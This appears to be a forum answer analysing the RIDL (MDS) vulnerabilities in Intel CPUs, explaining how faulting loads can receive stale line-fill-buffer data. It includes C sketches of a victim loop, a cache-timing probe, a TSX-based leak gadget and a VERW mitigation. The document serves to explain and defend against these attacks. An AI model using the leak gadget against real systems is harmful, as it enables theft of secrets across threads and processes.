About the RIDL vulnerabilities and the "replaying" of loads

I don't think load replays from the RS are involved in the RIDL attacks. So instead of explaining what load replays are (@Peter's answer is a good starting point for that), I'll discuss what I think is happening based on my understanding of the information provided in the RIDL paper, Intel's analysis of these vulnerabilities, and relevant patents.

Line fill buffers are hardware structures in the L1D cache used to hold memory requests that miss in the cache, and I/O requests, until they get serviced. A cacheable request is serviced when the required cache line is filled into the L1D data array. A write-combining write is serviced when any of the conditions for evicting a write-combining buffer occurs (as described in the manual). A UC or I/O request is serviced when it is sent to the L2 cache (which happens as soon as possible).

Refer to Figure 4 of the RIDL paper. The experiment used to produce these results works as follows:

  • The victim thread writes a known value to a single memory location. The memory type of the memory location is WB, WT, WC, or UC.
  • The victim thread reads the same memory location in a loop. Each load operation is followed by an MFENCE, and there is an optional CLFLUSH. The order of CLFLUSH with respect to the other two instructions is not clear to me from the paper, but it probably doesn't matter. MFENCE serializes the cache line flushing operation so the experiment can observe what happens when every load misses in the cache. In addition, MFENCE reduces contention between the two logical cores on the L1D ports, which improves the throughput of the attacker. (A sketch of this loop follows the list.)
  • An attacker thread running on a sibling logical core executes the code shown in Listing 1 in a loop. The address used at Line 6 can be anything. The only thing that matters is that the load at Line 6 either faults or causes a page walk that requires a microcode assist (to set the accessed bit in the page table entry). A page walk also requires using the LFBs, and most of the LFBs are shared between the logical cores.
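
Under these assumptions, here is a minimal sketch of the victim's side; the variable name and the written value are mine, and setting the memory type of the page (WB/WT/WC/UC) via the page attributes is not shown:

    #include <emmintrin.h>  /* _mm_mfence, _mm_clflush */
    #include <stdint.h>

    /* The single memory location; its memory type (WB/WT/WC/UC) would be
     * configured through the page attributes, which is not shown here. */
    static volatile uint8_t location;

    void victim(void)
    {
        location = 0x42;                        /* write a known value */
        for (;;) {
            (void)location;                     /* load the same location */
            _mm_mfence();                       /* serialize, as in the bullet above */
            _mm_clflush((const void *)&location); /* optional: make every load miss */
        }
    }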

It's not clear to me what the Y-axis in Figure 4 represents. My understanding is that it represents the number of lines from the covert channel that got fetched into the cache hierarchy (Line 10) per second, where the index of the line in the array is equal to the value written by the victim.
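
On the receiving end, "fetched into the cache hierarchy" would be detected by timing accesses to the covert-channel array, Flush+Reload style. A minimal sketch, assuming a 256-entry array with one page per value (the names and the stride are mine, not the paper's):

    #include <stdint.h>
    #include <x86intrin.h>  /* __rdtscp */

    #define STRIDE 4096  /* one page per value, to sidestep the prefetchers */
    extern uint8_t probe_array[256 * STRIDE];

    /* Returns the access time of the probe line for one value; a time below
     * the cache-hit threshold means that line was fetched at Line 10. */
    static uint64_t probe(unsigned value)
    {
        unsigned aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)*(volatile uint8_t *)&probe_array[value * STRIDE];
        uint64_t t1 = __rdtscp(&aux);
        return t1 - t0;
    }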

If the memory location is of the WB type, when the victim thread writes the known value to the memory location, the line will be filled into the L1D cache. If the memory location is of the WT type, when the victim thread writes the known value to the memory location, the line will not be filled into the L1D cache. However, on the first read from the line, it will be filled. So in both cases, without CLFLUSH, most loads from the victim thread will hit in the cache.

When the cache line for a load request reaches the L1D cache, it is first written into the LFB allocated for the request. The requested portion of the cache line can be supplied to the load buffer directly from the LFB, without having to wait for the line to be filled into the cache. According to the description of the MFBDS vulnerability, in certain situations stale data from previous requests may be forwarded to the load buffer to satisfy a load uop. In the WB and WT cases (without flushing), the victim's data is written into at most 2 different LFBs. The page walks from the attacker thread can easily overwrite the victim's data in the LFBs, after which the attacker thread will never find the data there. All load requests that hit in the L1D cache don't go through the LFBs; there is a separate path for them, which is multiplexed with the path from the LFBs. Nonetheless, there are some cases where stale data (noise) from the LFBs is speculatively forwarded to the attacker's logical core, probably coming from the page walks (and maybe from interrupt handlers and hardware prefetchers).

It's interesting to note that the frequency of stale data forwarding in the WB and WT cases is much lower than in all of the other cases. This could be explained by the fact that the victim's throughput is much higher in these cases, so the experiment may terminate earlier.

In all other cases (WC, UC, and all types with flushing), every load misses in the cache and the data has to be fetched from main memory to the load buffer through the LFBs. The following sequence of events occurs (a sketch of the attacker's gadget follows the list):

  1. The accesses from the victim hit in the TLB because they are to the same valid virtual page. The physical address is obtained from the TLB and provided to the L1D, which allocates an LFB for the request (due to the miss), and the physical address is written into the LFB together with other information that describes the load request. At this point, the request from the victim is pending in the LFB. Since the victim executes an MFENCE after every load, there can be at most one outstanding load from the victim in the LFBs at any given cycle.
  2. The attacker, running on the sibling logical core, issues a load request to the L1D and the TLB. Each load is to an unmapped user page, so it will cause a fault. When it misses in the TLB, the MMU tells the load buffer that the load should be blocked until the address translation is complete. According to paragraph 26 of the patent and other Intel patents, that's how TLB misses are handled. While the address translation is still in progress, the load remains blocked.
  3. The load request from the victim receives its cache line, which gets written into the LFB allocated for the load. The part of the line requested by the load is forwarded to the MOB and, at the same time, the line is written into the L1D cache. After that, the LFB can be deallocated, but none of the fields are cleared (except for the field that indicates that it's free). In particular, the data is still in the LFB. The victim then sends another load request, which also misses in the cache, either because it is uncacheable or because the cache line has been flushed.
  4. The address translation process of the attacker's load completes. The MMU determines that a fault needs to be raised because the physical page is not present. However, the fault is not raised until the load is about to retire (when it reaches the top of the ROB). Invalid translations are not cached in the MMU on Intel processors. The MMU still has to tell the MOB that the translation has completed and, in this case, a fault code is set in the corresponding entry in the ROB. It seems that when the ROB sees that one of the uops has a valid fault/assist code, it disables all checks related to the sizes and addresses of that uop (and possibly of all later uops in the ROB). These checks don't matter anymore. Presumably, disabling these checks saves dynamic energy. The retirement logic knows that when the load is about to retire, a fault will be raised anyway. At the same time, when the MOB is informed that the translation has completed, it replays the attacker's load, as usual. This time, however, some invalid physical address is provided to the L1D cache. Normally, the physical address needs to be compared against all requests pending in the LFBs from the same logical core to ensure that the logical core sees the most recent values. This is done before or in parallel with looking up the L1D cache. The physical address doesn't really matter here because the comparison logic is disabled; the results of all comparisons behave as if they indicate success. If there is at least one allocated LFB, the physical address will "match" some allocated LFB. Since there is an outstanding request from the victim, and since the victim's secret may have already been written into the same LFB by previous requests, the same part of the cache line, which technically contains stale data (and in this case the stale data is the secret), will be forwarded to the attacker. Note that the attacker has control over the offset within a cache line and the number of bytes to get, but cannot control which LFB. The size of a cache line is 64 bytes, so only the 6 least significant bits of the virtual address of the attacker's load matter, together with the size of the load. The attacker then uses the data to index into its array to reveal the secret using a cache side-channel attack. This behavior would also explain MSBDS, where apparently the data size and STD uop checks are disabled (i.e., the checks trivially pass).
  5. Later, the faulting/assisting load reaches the top of the ROB. The load does not retire, and the pipeline is flushed. In the case of a faulting load, a fault is raised. In the case of an assisting load, execution is restarted from the same load instruction, but with an assist to set the required flags in the paging structures.
  6. These steps are repeated. But the attacker may not always be able to leak the secret from the victim. As you can see, the attacker's load request has to hit an allocated LFB entry that contains the secret. LFBs allocated for page walks and hardware prefetchers may make it harder to perform a successful attack.
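
Putting steps 2-5 together, one way to structure the attacker's side is sketched below. This is my illustration, not the paper's code: it uses TSX to suppress the fault for brevity, whereas Listing 1 in the paper uses an unmapped/demand-paged address with recovery handled differently, so treat the names and details as assumptions (compile with -mrtm):

    #include <immintrin.h>  /* _xbegin, _xend, _XBEGIN_STARTED (RTM) */
    #include <stdint.h>

    #define STRIDE 4096
    extern uint8_t probe_array[256 * STRIDE];  /* covert-channel array (hypothetical) */
    extern uint8_t *fault_addr;                /* points into an unmapped user page (step 2) */

    void attacker_iteration(void)
    {
        if (_xbegin() == _XBEGIN_STARTED) {
            /* Step 4: the replayed, faulting load transiently receives
             * stale LFB data instead of architectural memory contents. */
            uint8_t leaked = *fault_addr;
            /* Encode the leaked byte into the cache (the Line 10 analogue). */
            (void)*(volatile uint8_t *)&probe_array[(unsigned)leaked * STRIDE];
            _xend();
        }
        /* Step 5: the fault aborts the transaction; probe_array is then
         * timed with a cache side channel to recover the byte. */
    }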

If the attacker's load doesn't fault/assist, the LFBs receive a valid physical address from the MMU, and all the checks required for correctness are performed. That's why the load has to fault/assist.

The following quote from the paper discusses how to perform a RIDL attack in the same thread:

we perform the RIDL attack without SMT by writing values in our own thread and observing the values that we leak from the same thread. Figure 3 shows that if we do not write the values ("no victim"), we leak only zeros, but with victim and attacker running in the same hardware thread (e.g., in a sandbox), we leak the secret value in almost all cases.

I think there are no privilege level changes in this experiment. The victim and the attacker run in the same OS thread on the same hardware thread. When returning from the victim to the attacker, there may still be some outstanding requests in the LFBs from the victim (especially from stores). Note that in the RIDL paper, KPTI is enabled in all experiments (in contrast to the Fallout paper).

In addition to leaking data from LFBs, MLPDS shows that data can also be leaked from the load port buffers. These include the line-split buffers and the buffers used for loads larger than 8 bytes in size (which I think are needed when the size of the load uop is larger than the width of the load port, e.g., 256-bit AVX loads on SnB/IvB, which occupy the port for 2 cycles).
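
For illustration, exercising the line-split buffers only requires a load that crosses a 64-byte cache line boundary; a minimal sketch (the buffer layout and names are mine):

    #include <stdint.h>
    #include <string.h>

    /* An 8-byte load starting 4 bytes before a 64-byte boundary spans two
     * cache lines, so it is split and serviced via the line-split buffers. */
    uint64_t line_split_load(const uint8_t *buf /* 64-byte aligned, >= 68 bytes */)
    {
        uint64_t v;
        memcpy(&v, buf + 60, sizeof v);  /* typically compiles to one unaligned load */
        return v;
    }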

The WB case (no flushing) from Figure 5 is also interesting. In this experiment, the victim thread writes 4 different values to 4 different cache lines instead of reading from the same cache line. The figure shows that, in the WB case, only the data written to the last cache line is leaked to the attacker. The explanation may depend on whether the cache lines are different in different iterations of the loop, which is unfortunately not clear in the paper. The paper says:

For WB without flushing, there is a signal only for the last cache line, which suggests that the CPU performs write combining in a single entry of the LFB before storing the data in the cache.

How can writes to different cache lines be combined in the same LFB before storing the data in the cache? That makes zero sense. An LFB can hold a single cache line and a single physical address. It's just not possible to combine writes like that. What may be happening is that WB writes are being written into the LFBs allocated for their RFO requests. When the invalid physical address is transmitted to the LFBs for comparison, the data may always be provided from the LFB that was last allocated. This would explain why only the value written by the fourth store is leaked.
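
To make the Figure 5 setup concrete, the victim would be doing something like the following sketch (the values and layout are assumptions; the paper doesn't give this code):

    #include <stdint.h>

    /* Four stores to four distinct cache lines per iteration. */
    static uint8_t lines[4 * 64] __attribute__((aligned(64)));

    void victim_fig5(void)
    {
        for (;;) {
            for (int i = 0; i < 4; i++)
                lines[i * 64] = (uint8_t)(0x10 + i);  /* one store per line */
        }
    }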

For information on MDS mitigations, see: What are the new MDS attacks, and how can they be mitigated? My answer there only discusses mitigations based on the Intel microcode update (not the very interesting "software sequences"). A sketch of the VERW idiom used by that mitigation follows.
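
With the updated microcode, executing VERW with a memory operand that references a valid writable data-segment selector also overwrites the affected buffers (Intel's MD_CLEAR functionality). A hedged sketch; using the current %ds as the selector is my assumption of a convenient valid one:

    #include <stdint.h>

    /* Executes VERW on a valid writable data-segment selector. With the MDS
     * microcode update (MD_CLEAR), this also overwrites the store buffers,
     * fill buffers, and load ports. */
    static inline void clear_cpu_buffers(void)
    {
        uint16_t ds;
        __asm__ volatile("mov %%ds, %0" : "=r"(ds));
        __asm__ volatile("verw %0" : : "m"(ds) : "cc");
    }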

The following figure shows the vulnerable structures that use data speculation.